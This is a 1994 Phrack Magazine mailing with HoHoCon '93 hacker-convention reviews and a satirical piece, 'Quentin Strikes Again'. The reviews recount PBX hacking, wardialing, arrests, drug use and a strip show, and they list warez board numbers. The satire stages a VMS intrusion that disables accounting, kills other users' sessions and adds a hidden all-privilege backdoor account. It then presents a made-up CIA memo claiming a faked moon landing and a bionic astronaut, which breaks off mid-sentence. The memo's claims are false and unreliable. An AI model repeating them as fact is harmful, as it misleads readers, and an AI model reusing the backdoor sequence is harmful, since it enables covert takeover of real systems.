Agency organization, you are urged to be always mindful of the importance of the work being accomplished by NSA and of the unique sensitivity of the Agency's operations. From phrack@well.sf.ca.us Thu Mar 31 21:27:46 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18698; Thu, 31 Mar 94 21:27:30 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id XAA00745; Wed, 30 Mar 1994 23:41:51 -0800 Date: Wed, 30 Mar 1994 23:41:51 -0800 From: Chris Goggans Message-Id: <199403310741.XAA00745@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-11 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 11 of 28 **************************************************************************** Ho Ho Con Miscellany HoHoCon '93 review from the European point of view <=====================================================> This is Onkel Dittmeyer telling you his experiences at the HoHoCon, which no-one really gives a @#*! about. It might be fun reading anyway. " Maybe I am just a lumpy coder, but at least my dad is not selling WOMEN'S SHOES. " - Guess Who I arrived at the con one day too early, before anyone else had showed up, and started striving through the neighborhood. Well, this looked like fun. The Hilton and the Super-8 were, along with a mall and a South Western Bell building with light-at-night, wide open, overflowing dumpsters situated between highways, a couple miles outside of town. Cool. Used to Europe, where there is more public transportation than cars on the street, I was kinda stuck in there, so I spent my time chatting with the front desk clerk of the motel ("Monty? Ahh, ya mean Monty from the hotel security? Well, don't spread the word, he has a penis problem.."). Everybody was able to confirm this a day later during on a police raid, but let's save that for later. So stuck between a WAL-MART ("SHOTGUNS! ON SALE! JUST $99"), a movie theater and a cheap mall I spent this day sipping complimentary tea at the front desk and watching Wayne's World 2. ("A Unix Book. Cool.") On the next day, all kinds of people started to flow in, and I spent my time following around various people since I came to the con alone, not seeing one familiar face around. I bumped into Minor Threat and his trusty friend Mucho plus a bunch of other guys trying to fix something with ToneLoc. Walking around a little more, I ran into some dudes that were busy hacking into the hotel's PBX using its 1200-bps line.. Walking over to the Hilton, I found a tone in a wall jack and called home. Still talking, hunger overcame me and I decided to go to the mall and grab munchies. Walking past the Hilton's pool, a kid was trying to fish his scanner out of the water. Remember: A PRO-43 does NOT stay afloat! Later that night, the whole place was pretty crowded already. It was unreal. The lobby was crowded by at least two dozen scanner-wielding kids, trying to find the frequency for the hotel security. The guards must have been felt pretty strange - each time they talked, something like five people with frequency counters walked past them. Finally, the word spread (466.025/825) and each time some guard started talking, it was echoing back over everyone's scanner in a two-mile range around the party place. I soon left the 3L3eT pIt and hung out with AKA to play some stupid games ("Oh, there is a calling card on the floor." "Where??" "You can't see it, its eleet!") when we saw red and blue lights in front of the Super-8 Motel. Three cop-cars had arrived, and they busted an about 14-years old kid for scanning local numbers from his motel room. While everybody stood around in front of the room where they hold (or ABUSED) the kid, people were thinking if this would be legal, arresting and squeezing this kid with no lawyer and no parents around, they sped past us with their victim, and someone told the kid that it was his constitutional right to remain silent until he would get a lawyer or at least a parent. And guess: The cops pulled the guy out and told him that he should not stand around and advise people about their constitutional rights. Quote: " This is the manager, this is a police officer, I am the security guard. LEAVE! " - "And I will NOT leave." Good thing that someone was videotaping the whole thing. So much action, and the con hadn't even started. Tired of so eViL K-r0cKinG rAcIsM I stumbled to my room and fell asleep on some standup comedy on TV. Tomorrow was the con! The next morning around 9, I found the food court in the mall crowded. It seemed like everybody on the con was going to eat the last time for his life, or at least the last time before the 6-hour Con-A-Thon started. Walking around in the empty conference room, some hotel employee asked me "HoHoCon? Is this like a Santa Claus meeting or something?" Maybe it was just cause I wore a santa-hat. When Drunkfux finally started the meeting one hour late I found myself squashed in between some system administrator and another guy from some three-letter-agency that typed everything that was said into his laptop at something like 2.000.000 characters a second. Scared shitless, I was listening to the events, still a little drowsy from very little sleep the last night - I only remember Cap'n Crunch talking about boxing in Russia (something that interested me, at least), and the LOD members talking about some data preservation project - if you are interested what in detail was talked about, I'm sure Drunkfux will sell you the videotape for a couple hundred $. In a break, he was selling merchandise, and I think he didn't look more happy during the whole con than in the moment everybody was waving with twenty-dollar bills.. Phat pockets was also what the LOD guys were looking for.. (just in case you don't know: They are collecting old message boards and sell the printout for something like $35). After this sellout session, I found a sign on the wall: "hoho.con.com --->", and, in room 260 someone piled up an enormous mass of equipment, including something like 4 UNIX machines, a SLIP connection, 20" screens, PET's.. Plus, the room was stacked with 30-40 people, and I mean STACKED. Most people were wasting their time entering commands like "mget /warez/eleet/hot/0-day/*.*" Sick of that, I grabbed a bunch of people and we went trashing at SW-Bell around the block, and whoops! we found a diagram like this: (Europe) (Asia) (Australia) ______ ____| |____ | | | Texas o <====== Austin \ / \ / \_________/ (North America) (South America) Now we know it: South Western Bell believes that Austin, Texas, is the center of the world. Well, from the 17th to the 19th of December, 1993, it was. TEN THINGS I LEARNED AT HOHOCON '93 1. Social-Engineering the front-desk clerk PAYS! 2. If you drink 20 cups of complimentary tea, they WILL hassle you. 3. If the guard hears his voice over your scanner, he WILL hassle you. 4. If you sign on as CLIFF STOLL and pay cash, they WONT hassle you. 5. Don't scan from a hotel room. But feel free to hack the PBX. 6. Pizza Hut accepts all major credit cards. 7. Austin, Texas, is the center of the universe. 8. Some people really want room service in a Super-8 Motel. 9. A radio shack is not lighter than water nor water-proof. 10. Barney is a purple penis. Shouts to Tr8or and SevenUp: Why didn't you join me? Write to onkeld@ponton.hanse.de for further discussion.... ------------------------------------------------------------------------------ Conference Behavior - a Study of the Lame and the Damned by Holistic Hacker/R2 [This little file was inspired by a talk Phantom Phreaker and I had at HoHoCon last year, after some of the stupid shit that went on at it and SummerCon. The rough draft was written on my laptop on the flight back from Austin.] It seems some little kids are having problems figuring out how to act at the various hacker cons around the country. Hacking has nothing to do with how many smoke bombs you can drop in the hotel or how many fire extinguishers you steal. If you lamers think that being away from mommy for the first time in your life means that you can trash a hotel, then do it. By all means make it a local one first, so Mom and Dad can bail your sorry ass out of jail. I get really tired of going to a con and some little punk wants to play eleet anarchist and then the cops show. Cons are a chance to learn and/or share info, see people, and have a good time. Shit like what has happened this last year just isn't needed. All that comes out of stupid actions is a bad rap on the "underground." Some friends and I were in the hotel bar Saturday night and the bartender was telling us how the hotel people were really getting tired of the lame shit. I was in one room Saturday night, swapping files and talking when the smoke alarm went off at 3 AM or so. I bet whoever did it got a real kick seeing all of the people up, and he probably creamed his jeans when the fire truck showed up. Emergency personnel don't need to waste their time on wannabe anarchist weenies, it isn't their job. Another brilliant soul decided to set off one of the fire extinguishers in the Super 8. I saw other jerks trying to wake up the people on the top two floors of the Hilton at 2 in the morning. I saw another guy carrying two extinguishers off, and he didn't look like hotel staff. Another genius tried cutting a hole in the vending machine with a glass cutter. Just because it isn't your property means you can trash it. The fucked-up elevator control panels, the damaged exit signs, etc. are costs the hotel passes on to the customers and to us. Even worse, when the word gets out, the hotels don't want the cons back. Why would they want to rent us rooms, if they are just gonna get trashed? If this is how you want cons to be, then hold your own. ------------------------------------------------------------------------------ All typos are intentional. The following summary of HohoCon 93 is based solely upon my perceptions and are subject to the laws of physics. Take these comments as you see them. By Frosty First off, there was a $5 charge at the door. This also entitled you to partake in the raffle offered of lame-to-cool objects. $100 would rig the raffle in your favor. One person walked away with a full //e system, and another with a 486 system. The Conference --- ------------------ Bruce Sterling - A humorous talk that thrashed virii. Informed us of the #1 anti-virii person in Russia, Dimitri. Generously gave away several copies of "The Hacker Crackdown" on disk. Famous quote, "Information wants to be free." Ray Kaplan - A humorous security consultant. Wants to establish a site for security holes to be available. Had a brief Q&A session. Wants interaction between the security consultants and hackers. Also stressed protecting information and privacy. Douglas Barnes - Representatives from CypherPunks. Works in cryptography. Jim Famous quote, "I want to talk to my lawyer." Another quote, "Hackers are requested to call between 9 and 5." There are several Fidonet sites not allowing encrypted messages to go through. The liability decreases with a site allowing encrypted messages. ViaCrypt PGP is the legal version of PGP. Another quote, "A triple DES file is as good as unbreakable." Pushed the book "Applied Cryptography." Working on a digital Credit Union. System Administrators are not responsible for passing codes. Quote, "The net perceives censorship and routes around it." Grayareas - Made a magazine plug. Looking for information for the 'zine. Damien Thorn - Works on the 'zine "Nuts and Bolts." Talked about cellular tracking and hacking. Informed that a cell hacking program can be obtained from mkl@nw.com. Captain Crunch - Talked on the San Francisco raves and how they utilized aka John Draper networking and encryption to get their rave information out. Gave history and information on hacking Soviet phones and the KGB lines. Simmion - Attendee from Moscow. Stated there was no evidence of virii being highly prolific in Russia. Almost all software is free in Russia. Most conferences in Russia are done by BBS's. Russians can not afford the high software prices legally. LOD/Comm - Project information on their Digital Archive project. Also, presented a cash donation to the SotMESC to help fund a scholarship campaign for those involved in the hacking realm. Erik Bloodaxe - Conversed about wireless modems and Email networks. The Omega White Knight - gave out copies of a government document on UFO coverups. Count Zero - Members of the cDc/RDT. Handed out fliers and gave a packet Kingpin radio demonstration. Informed they would be coming out with the 'Jolly-Roger Dialer' for $80 approx. that would be better than the 'Demon-Dialer' offered by Hack-Tic. Brian Oblivion - Conversed about legalities and the Clipper Chip. Informed us that the EFF is not promoting help on court cases ( they're too big ). Quoted, "The Internet is the collective consciousness of the community." Quoted Compuserve that, "The Internet is sewage." Errata ------ The Unix at the Super 8 Hotel was hacked. Room 293 at the Super 8 was raided the day prior to the conference starting. A LAN was set up in 260 at the Super 8 ( Thanks Georgia Tech ). Kudos to Annaliza / Torquie for filming the conference for her documentary. Kudos to 'Vibe' for giving away free shirts to the public. DO NOT leave anything expensive out, it will be stolen !!! Kudos to Malicious and his group for being the friendliest hacks. Kudos to Grayarea, who will be providing her coverage of the Con. The Techno-Porn party the SotMESC sponsored went well through the night. Many thanks to the mall-girls that showed up to lend themselves to the masses. Cold Pricklies to whoever set the fire alarms off Saturday night. A big question mark to whoever acquired the large 30' inflatable balloon. Warez Boards -> 214-642-0003 NUP: flying man 214-642-1940 / 264-6269 NUP: london run 817-551-5404 NUP: none THE CHEAP-SEX AWARD ------------------- The personnel in room 508 at the Hilton that provided strippers, but enforced a door-charge and sex-charge for services. THE MOST OBNOXIOUS PERSON AT HOHOCON 1993 AWARD ----------------------------------------------- The AT&T person who took pictures of EVERYONE in the line going into the conference center. A Gif of this individual will be provided later =:) This is just a 'Spur of the Moment' release. We look forward to view-points from other sources. ------------------------------------------------------------------------------ HoHoCon '93 - Out With A Bang January, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Winn Schwartau (Page 8) (Security Insider Report) The hackers did it again. A monster party, several hundred strong, where hacking was the agenda. HoHoCon is the annual hacker's convention in Texas, where all hell breaks loose. December 17-19 in Austin was the host of this last one. According to the hackers, it was a great party; the ethernet lines were run between rooms; the net was connected, and everyone consumed mass quantities of their favorite legal substance or controlled substance. One hacker was busted, apparently, for breaking into the hotel's PBX system and dialing the Planet Krypton (or some such place) and the cops sat outside the front door just in case. In case of what? According to the hotel, in case of crazy kids getting too crazy. This last HoHoCon was the biggest yet; estimates from 250-500 people attending to learn about hacking; keep tabs on the hackers; or hack themselves into position of respect amongst their peers. One attendee took roll after roll of photos of hackers; some hackers got paranoid, others laughed at him hiding behind pillars and jumping out to snap a pix. Whatever. On the other hand, some security professionals who attended were absolutely aghast at what they saw; wild kids, with no reins, breaking into computers over the net is not fun nor legal. The drug and alcohol consumption was too extreme, and the messages and conference sessions somewhat disorganized. But, nonetheless, not one person I spoke to said they wouldn't attend again next year. So there must be something to it. Even legendary phreaks like John Draper aka Captain Crunch were there, despite his tenuous hold on reality and emanating odor. This was the minority, though, and most security pros said they picked up a few tricks here and there. HoHoCon next year, the organizers fear, will turn legit if too many 'suits' come so they have to promote the event better. Next year's HoHoCon won't be held until January of 1995, making attendance easier for those who have Holiday conflicts. We'll keep you informed. ------------------------------------------------------------------------------ HoHo Con '93 by Erik Bloodaxe It was the eve of HoHoCon 93 and I found myself caught in a serious dilemma. I had promised to provide this year's "entertainment" yet I knew I was going to back out of it. I had received about a million emails and chat messages bugging me about the "bondage show" that was supposed to transpire that Saturday night and had tried my hardest to give them little or no commentary, knowing full well that I was going to flake out at the last moment. So here I was, driving towards the Austin Airport Hilton, trying to come up with excuses about why there would be no show to some 300 hormonal sociopaths. Every scenario seemed bleak: "Phrack Editor Vivisected!" "Hacker Revolt Leaves Three Dead, 15 Wounded." I tried to blow it off, consoling myself that no one would really give a shit, and that it was only my own ego that demanded that I fulfill the promise of sleeze. Upon arrival at the Hilton, I was amused to find some 30 or more miscreants milling about the lobby, amusing themselves with house phones and sordid tales of last week's hack. As usual, there was not a payphone to be had, a direct result of the numerous Radio Shack dialers on hand (model 43-141). I mingled somewhat distantly, looking for Chasin, Tcon, Lex, Drunkfux or anyone else I needed to talk to. Of course they weren't there. I was beginning to wonder how in the hell I could pass the time when I was paged by Lex. Lex Luthor was staying a safe distance from the main fracas. In typical Luthorian paranoia, he was determined to not have his name on anything, such as car rental or hotel room, so by staying just far enough away he hoped to not have his name on any arrest reports either. Lex, Professor Falken, Al Capone, Mark Tabas, The Mentor and I were all supposed to have dinner that evening. After getting Lex's room information, I took off to get Mentor. Getting everyone together was somewhat of a clusterfuck. Tabas was located at the bottom of a 151 bottle, but surfaced in time to grab dinner. During dinner at Baby Acapulco's, as the award-winning waitstaff lost most of our orders, Mentor reminisced about some of my more unbalanced teenage moments such as: the time I cut the break cables on a Mercedes because its owner had made the moves on my evening's female target, the knife and gun wielding passout on the railroad tracks, etc. He ended with, "You sure have changed. I'm surprised you aren't dead." I suddenly felt old. It would not be the last time I felt that way that weekend. After dinner I decided to be a jerk and lash out at Tabas for insulting my overinflated ego on the net. It accomplished nothing, except to further distance ourselves but this evil voice in my head deemed it necessary. We agreed to disagree and to try to put aside our numerous past problems for the interim, although I doubt either of us believed in the resolution. Once back at the Hilton, things were beginning to heat up. Some hundred or more conferees were loitering back and forth from the Hilton to the Super 8 next door. I finally managed to hook up with Chasin, Tcon, Koresh and Louis Cypher in their room at the Super 8. Lcypher was enjoying what would probably be his last taste of freedom, since he was due to ship out to federal boot camp the next month. Sometime thereafter, a score of people began running upstairs with computer equipment, laughing to themselves. As would be typical, a short time later several police cruisers showed up. The kids had broken into a phone closet and ran extra lines to their room to either: a) run a bbs, b) wardial the city or hotel, or c) prove once and for all they were the dumbest people in attendance. A member of the Austin EFF chapter ran about screaming about the rights of the accused. The police told him that if he didn't shut up he would be going downtown as well. The silence came instantly. The appearance of police so soon on the first evening made several people quite nervous, especially those guests with rather large pupils, whose numbers were growing in abundance. They sat in their rooms with the lights dimmed (or off) peering out the curtains wondering if the cops would be knocking on their doors next. Word reached us that KevinTX had shown up. In typical flair, Kev had blown in straight from Las Vegas where he had just won some $20,000 playing Blackjack, and was in a very festive mood. Once we reached his floor, we were greeted with the sounds of a dozen tropical birds in terrible agony. Obviously "the tank" had been filled, and was being rapidly drained. Inside the room black plastic bags lined the floor giving the appearance of a recent trashing run, but in reality were the victims of an unforgiving blast of n2o. Some Andrew Blake film played on the VCR Kevin and his crew had brought, and a new camcorder was being erected to capture the planned debauchery on tape. We asked Kevin how on earth they managed to wheel in a 20 lb tank of nitrous through the lobby and up to the room without being questioned. Kevin said they put it under a jacket and just walked right through. I wondered how long it would be before everyone else began wheeling in kegs. I begged everyone not to put the bags over their heads, as resuscitating any potential asphyxiation victim was not in my agenda. (Quick flashback to a blue-faced man spasming from oxygen depravation, "No really officer, I don't know why he put that bag on his head and went to sleep.") Besides, it would be too far to drag a dead body down to the dumpster from the hotel room without attracting suspicion. The tank was drained and the crowd dwindled. Reflecting upon the altered states of those wandering almost zombie-like around the hotels, I decided that if anyone were to be raiding the con it should be the DEA rather than the FBI. I arrived at the con the next morning lugging a box full of my t-shirts, ready to make the rent. In the conference room Bruce Sterling was in the middle of an incredible rant about the evils of Virii. I don't know what the hell he was talking about. I'm not quite sure if anyone did, but I got the impression that he got zapped. A note to the kiddies: don't copy that floppy! At the door, dFx was busily commandeering the five dollar "voluntary contribution." I asked him how the take was and he whipped out a stack of money that would choke an elephant. I asked him for my share for being his marketing and advertising rep. The money and dFx disappeared. Damien Thorn of Nuts & Volts, whose column is the ONLY reason I subscribe, took the stand and talked about the magazine and his column. I jumped up and asked him about his involvement with Phoenix Rising Communications, and suggested they not use the name "The Phoenix Project" as their BBS name. Damien seemed somewhat apologetic when he said that he didn't realize that it had already been used in the past. (Obviously Sterling's book didn't get read by everyone.) I took off to find out where the casualties from last night were hiding. After a lengthy and fruitless search for Chasin, Tcon or KevinTX, I stumbled back into the con area just in time to find out that LOD Communications would be hitting the podium next. As we all wandered up front, (we being me, Lex, Tabas, Phantom Phreaker, Professor Falken and Al Capone), an explosion of camera flashes shook the conference room. It was the most ridiculous thing I have ever been a witness to. I felt pretty sorry for Lex, who had managed to avoid being photographed as "Lex Luthor" for his entire life, now being the target of every butthead with a Nikon in the greater Austin area. After we rambled about the BBS archive project, I got the chance to give one of the worst presentations of my life. I will credit some of this to the lack of display technology (mainly overhead projector and VGA adaptor) but the main fault was my own. I spoke for a bit about wireless wide area networking via commercial packet radio and about services such as RadioMail. Afterwards, Chasin and I introduced White Knight and The Omega who, in typical cDc fashion, relayed the further adventures of "America's Favorite Hacker: Quentin." At the end of their speech, they offered about a dozen copies of Quentin's latest exposure of a government cover-up. The madcap dash of reporters, hackers and various other would-be co-conspirators to grab the sacred printout was like the closing scene of "It's a Mad Mad World." The stage rush was not terribly unlike my first Metallica concert: people diving over chairs, crawling over heads, screaming, arms flailing. The only difference were the reporters yelling "Press! Press! I must have a copy!" The conference wrapped up with attorney Steve Ryan talking about the sorry state of computer law. Bernie Milligan of Communications & Toll Fraud Specialists from Houston finally ran out of film. (Bernie, if you recall, was at HoHo '92 sitting at the back of the room with the Super Ear. I wonder how much he gets for the photos. Maybe he just tacks them up on his wall and has little fantasy conversations with them as he spanks his monkey. I don't know.) After the speaking was concluded, Weevil wandered over and asked me when the bondage show would be going on. I told him that it would not be happening. Weevil, still very elated over his rave reviews in "Dazed and Confused," looked at me and in a stereotypical Hollywood-esque display of confidence said, "Don't worry about it dude. I'll take care of it." A 17 year old actor and would-be pimp. Yeah, right. I got shanghaied by John Littman who was working on his book about Kevin Poulsen, Agent Steal and friends. We talked for a bit, and I came to the following conclusions: 5 REASONS WHY I AM LIKE AGENT STEAL 1. We both shared a knack for dating strippers. 2. We are both long haired, skinny, aging hackers. 3. We both know the value of a carefully placed camcorder. 4. We both have been the subject of investigations by the government. 5. We both have assisted the government. 5 REASONS WHY I AM NOT LIKE AGENT STEAL 1. I have both my original legs. 2. I only use Saran Wrap for leftovers. 3. I would never dress like any member of Poison. 4. I stopped breaking into buildings when I was 14. 5. I would never turn in my friends to save my own ass. That evening as everyone was getting antsy, Frosty popped up with his "Techno-Porn." Something like 24 hours of non-stop pornography compressed into 6 hours. You'd have to see it to understand. Everyone seemed to migrate towards 508, most likely a direct result of the internal sex & drug divining rods built into the subconscious of every attendee. Sometime around 9 or 10 in the evening, Weevil showed up parading five very attractive, scantily clad young women. The strippers made their way through the lobby of the Hilton evoking a Pied Piper effect, dragging hundreds of drooling hackers in their wake. They managed to get into the hotel room unscathed. Outside the room the crowds gathered, anxious to get a peek at the girlies. The girls, meanwhile, got somewhat agitated, looking around at their predicament. They had given up their Saturday night shift at Sugar's Cabaret (an Austin upscale nudie bar) for the prospect of making some easy cash at HoHoCon. Apparently Weevil exaggerated a bit about the quality of the attendees in his fervor to coax them back to the hotel. I, being a take charge kind of guy, asked the girls what they needed, took some orders, and announced to the crowd that anyone who did not have at least forty dollars needed to get the fuck out. Once word of the necessity of money spread among the riot-like crowds swarming the 5th floor, they became like Donn Parker's hair and thinned quickly and ultimately disappeared entirely. Zar took over the job of guarding the door and making sure that no one got in without showing that they had cash for the girls, and KevinTX rounded up cash from within the room and manned the camcorder and radio. After a few beers, everyone loosened up and the show began. Soon, there were topless women everywhere. There were "table-dances" happening on the toilet, there were women on the beds, and grinding away on the floor in front of a mirror. It was the kind of thing that I'm sure Dr. Mitch Kabay would be shocked and dismayed by, but unfortunately he wasn't in the room. Perhaps he didn't have the cash to get in. Everyone in the room was having a blast. Consultants, reporters, and hackers all equally sharing in the debauchery. Zar gave new meaning to the word "man-handling." I can only thank God that I had sold all my shirts, so I had cash to spare. The night went on, the beer flowed, the dopamine inhibitors kicked in full force, and the money changed hands faster than could be counted. By the end of the evening, everyone had received several "table dances," KevinTX had whip marks on his back, Weevil had won my complete admiration, and the girls made a small fortune. Each of the dancers walked away with over $200 in cash. The biggest winner was a really hot little 18 year-old named Cathy who raked in almost $400. As the night drew to a close, the room emptied, the girls gathered up their outfits and made for home, or paired up to go somewhere else. I awoke Sunday somewhere else. No comment. (I couldn't anyway, since I have no recollection.) So ended HoHoCon. --------------------------------------------------------------------------- Additional HoHoCon Reviews: HoHoCon Review Spring 1994 ~~~~~~~~~~~~~~ By Netta Gilboa (Gray Areas) (Page 30) Rising From the Underground March, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Damien Thorn (Nuts & Volts) (Page 100) ------------------------------------------------------------------------------ (Vibe Magazine & Aasahi Computing to have articles soon) From phrack@well.sf.ca.us Thu Mar 31 19:29:15 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18307; Thu, 31 Mar 94 19:28:41 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id XAA00851; Wed, 30 Mar 1994 23:42:15 -0800 Date: Wed, 30 Mar 1994 23:42:15 -0800 From: Chris Goggans Message-Id: <199403310742.XAA00851@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-12 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 12 of 28 **************************************************************************** "Quentin Strikes Again" In the Fall of 1992, "NBC: Dateline" aired a show on computer hackers, interviewing Erik Bloodaxe, Doc Holiday and a person named "Quentin." Half- way through the show, Quentin is shown with his back to the camera, text scrolling across his screen. Dateline seemed oblivious: on closer inspection, Quentin was displaying a file which listed various MIL and GOV sites which allegedly had "autopsies of extra-terrestrials on record", information about UFO crash sites, detailed governmental research on alien beings. By December, that Dateline episode had created quite a stir within the hacker community. Who was Quentin? What file was he displaying? Was this an elaborate hoax, a joke which failed to gain the attention of NBC? At HoHoCon '92 in Houston, Bloodaxe and Holiday explained that the file did exist and the information it contained was in fact true. Lending some credence to the story, well-placed sources indicated that the White House had requested a copy of the episode from NBC. Bloodaxe and Holiday refused to name the people involved, but explained that a relatively unknown group had formed to pursue a project they referred to variously as "Project ALF" and "Project Green Cheese", searching government computers for any evidence which might verify a UFO cover-up. Apparently they struck pay dirt. By the Summer of 1993, at least one member of Project Green Cheese had "disappeared." White House aide Vincent Foster turned up dead after an apparent suicide; among documents found in Foster's office possibly linking President Clinton to a failed Arkansas Savings & Loan, a videotape was also found: the Dateline episode on Hackers. Apparently buoyed by their success, the Green Cheese group began scanning an unpublished prefix in the 202 NPA toward the end of the Summer. They were surprised to learn that nearly every number in that prefix was answered by the same authoritative voice asking, "Who is this?" Not to be discouraged, the group continued until they happened upon a lone DEC Server. There they uncovered documentation suggesting a covert action of a different kind: a cover-up instigated by the three-letter agencies and NASA, perpetrated upon the public with the unwitting aid of the media in the early 1970s, beginning with the death of three astronauts. What follows is an excerpt of their discovery. -- The Omega White Knight cDc / RDT cDc / RDT DDDDD OOOO CCCC VV VV AA XX XX DD DD OO OO CC CC VV VV AAAA XX XX DD DD OO OO CC VV VV AA AA XXXX DD DD OO OO CC ---- VV VV AA AA XX DD DD OO OO CC ---- VV VV AAAAAA XXXX DD DD OO OO CC CC VVV AA AA XX XX DDDDD OOOO CCCC V AA AA XX XX DEFENSE ADVANCED RESEARCH PROJECTS AGENCY DOCUMENT REPOSITORY W A R N I N G: This computer system is operated by the United States Government and is protected under provisions of USC Title 23, Section 67. Unauthorized access is STRICTLY FORBIDDEN. ENTRANCE: USERNAME: FIELD PASSWORD: $ SET ACCOUNTING/DISABLE $ SET LOGINS/INTERACTIVE=0 $ SHOW USERS VAX/VMS INTERACTIVE USERS 23-JUL-1993 09:37:15.54 Total number of interactive users= 6 Username Process Name PID Terminal BRUNO BRUNO 0000026B TTD3: FIELD* FIELD 00000FF2 TTC2: JOHNSON _TTD5: 0000026D TTD5: LINCOLN LINCOLN 0000026A TTD2: SMITH SMITH 000001D8 TTD4: $ SET PROCESS/PRIVS=ALL $ STOP/ID=26B $ STOP/ID=26D $ STOP/ID=26A $ STOP/ID=1D8 $ SET DEF SYS$SYSROOT:[SYSEXE] $ RUN AUTHORIZE UAF> ADD BOVINE /PASSWORD=CULTEE /UIC=[099,900] /CPUTIME=0- /DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING UAF> EXIT $ DIR *.* [DEATH_STAR] [ECDYSIAST] [IPSUM] [KIMOTA] [LOREM] [MAGIC] [PPYRUS] [TOC] ^Y $ SET DEFAULT $ TYPE *.MAI;1 DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. TO: Thomas J. Kelley, Director, PPYRUS Section FROM: Bill Brown, PP Deputy Chief SUBJ: Preliminary Briefing #1 Special Projects, PPYRUS Pursuant to reg. 3-2638-A, it is my responsibility as Deputy Chief, this section, to inform and apprise the incoming Director of all special projects planned or currently underway, as well as incidental or related projects. PPYRUS projects, this Administration, include: Project Inception ------- --------- MAGIC 5/69 SKY-HOOK 7/69 ARAGON 11/69 ANTIGONE 1/70 KILO 9/70 ORACLE 4/71 DPULTRA 8/71 PPYRUS related projects, this Administration, include: Project Inception ------- --------- UMENSCH 2/63 CAPRICORN 7/68 Of these projects, DPULTRA (and two related projects, UMENSCH and CAPRICORN) require your immediate attention and approval. (1) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT CAPRICORN ---------- ------- --------- By 1965, NASA's public relations machine was in high gear, advertising amazing (and non-existant) advances in American space technology and setting an ambitious schedule for the Space Agency's top priority: a manned space flight to the moon by the end of the decade. Despite the few successes NASA and the Air Force had had with rocketry, in a memo to the President, dated 11/13/67, NASA reluctantly expressed some doubt that a moon mission could be accomplished even by 1973. The President made it clear that the moon mission was, by now, more of a political mission than one of science, and its success was of the utmost national priority. World sentiment at the time favored the Russians, their flawless successes a seeming vindication of the power and motivation of the Communist system. Further, the President felt that a success could deflect attention from the Vietnam war and re-invigorate public sentiment in the United States toward the nation, the Administration, and the ingenuity of American technology. As a contingency for failure, CAPRICORN was instigated, its final approval to be decided by the middle of the following year in a meeting between the President, DIRNASA, DIRCIA, DIRNSA and attendant adjutants. The President summed CAPRICORN up in these words, "If we can't be heroes, we can damn well act like heroes!" CAPRICORN's mission was a relatively simple one: covert deception of the public and media, under the guidance of PSYOPS and PPYRUS; a manned moon mission would be simulated and pre-recorded in a controlled environment, later to be broadcast "live." By June of 1968, CAPRICORN was recommended and Presidential approval given. (2) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT CAPRICORN (cont'd) ---------- ------- --------- CAPRICORN was an unqualified success resulting in, among other things, later congressional approval for a large appropriation of funds to further NASA's successful research. BACKGROUND, PROJECT UMENSCH ---------- ------- ------- In February of 1963, DARPA gained oversight of an ancillary NASA research project that began with the discovery of efficient micro-machines and light, extraordinarily strong alloys. These new discoveries implied the possibility for advance along a relatively new field of science: cybernetics. DARPA reacted enthusiastically by forming project UMENSCH. Most information on UMENSCH, DARPA is unwilling to share. But this much is clear: under the direction of DARPA, NASA got the opportunity to test this technology on a human subject with the crash of an experimental flying-wing in 1966. As his CLASSIFIED service record indicates for the years 1960 - 1965, Lieutenant Colonel Virgil Grissom (see Air Force files for Grissom, Virgil I., USAF 563-87-2981; CI DL 118-26-9069) had an exemplary record as an Air Force test pilot, including a stint as a U2 pilot during 1956-1959, performing reconaissance missions over Cuba and Southeastern China. In fact, it was Grissom's missions which confirmed the mass starvation of over 10 million Manchurian Chinese in 1959. Grissom barely survived an XF-17 crash at Edwards Air Force Base, September 17, 1966. His right arm was badly crushed during an emergency ejection shortly after take-off. DARPA offered Grissom a chance to regain the limb through risky, untried technology: a cybernetically-enhanced prosthetic implant. DARPA termed the marriage of cybernetic implants with biology, BIONICs. The surgery was successful well beyond UMENSCH's projections; not only did Grissom's BIONIC arm function as well as his original arm, but in conjunction with a BIONICly enhanced upper skeleture, Virgil's right arm was capable of lifting several hundred pounds and inflicting marked fatigue in steel objects. DARPA's investment of technology and secrets in Virgil Grissom in effect made Grissom UMENSCH property and necessarily privy to several sensitive projects. (3) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT UMENSCH (cont'd) ---------- ------- ------- Colonel Grissom was an obvious astronaut candidate and by the following year was training for GEMINI. In fact, because of Grissom's access to a project as sensitive as UMENSCH, Grissom was later tapped to aid in the staging of CAPRICORN. THE APOLLO LAUNCHPAD FIRE; GRISSOM, YOUNG, & WHITE --- ------ --------- ---- ------- ----- - ----- You're already well aware of the fire this July on the Apollo launchpad, which reportedly killed astronauts Grissom, Young and White. What you are not aware of, however, is that Grissom managed, with the aid of BIONICs, to escape the space capsule just before Young and White were asphixiated. It is not clear why Grissom apparently made no attempt to rescue his crew-mates or why he used the ensuing confusion to leave Canaveral. For whatever reason, Grissom is now a 